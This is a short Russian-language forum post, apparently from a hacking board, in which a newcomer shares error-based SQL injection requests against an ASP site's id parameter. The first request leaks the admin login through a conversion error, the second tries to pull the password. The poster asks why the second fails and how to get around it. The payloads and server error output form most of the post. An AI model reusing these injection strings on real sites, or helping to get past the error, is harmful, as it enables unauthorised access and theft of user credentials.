17.05.2009, 18:34
|
|
Новичок
Регистрация: 21.01.2009
Сообщений: 6
С нами:
9107642
Репутация:
0
|
|
Привет Всем.
Столкнулся с такой проблемой:
При запросе
_http;//site.ru/index.asp?id=23+or+1=(SELECT+TOP+1+login+from+user s)--
Выдает
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'admin' to a column of data type int.
/catalog_functions.asp, line 449
т.е. тут все норм
далее
http;//site.ru/index.asp?id=23+or+1=(SELECT+TOP+1+password+from+u sers)--
ответ
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'current_cat_id'
/catalog_functions, line 298
почему это происходит и как это обойти? |
|
|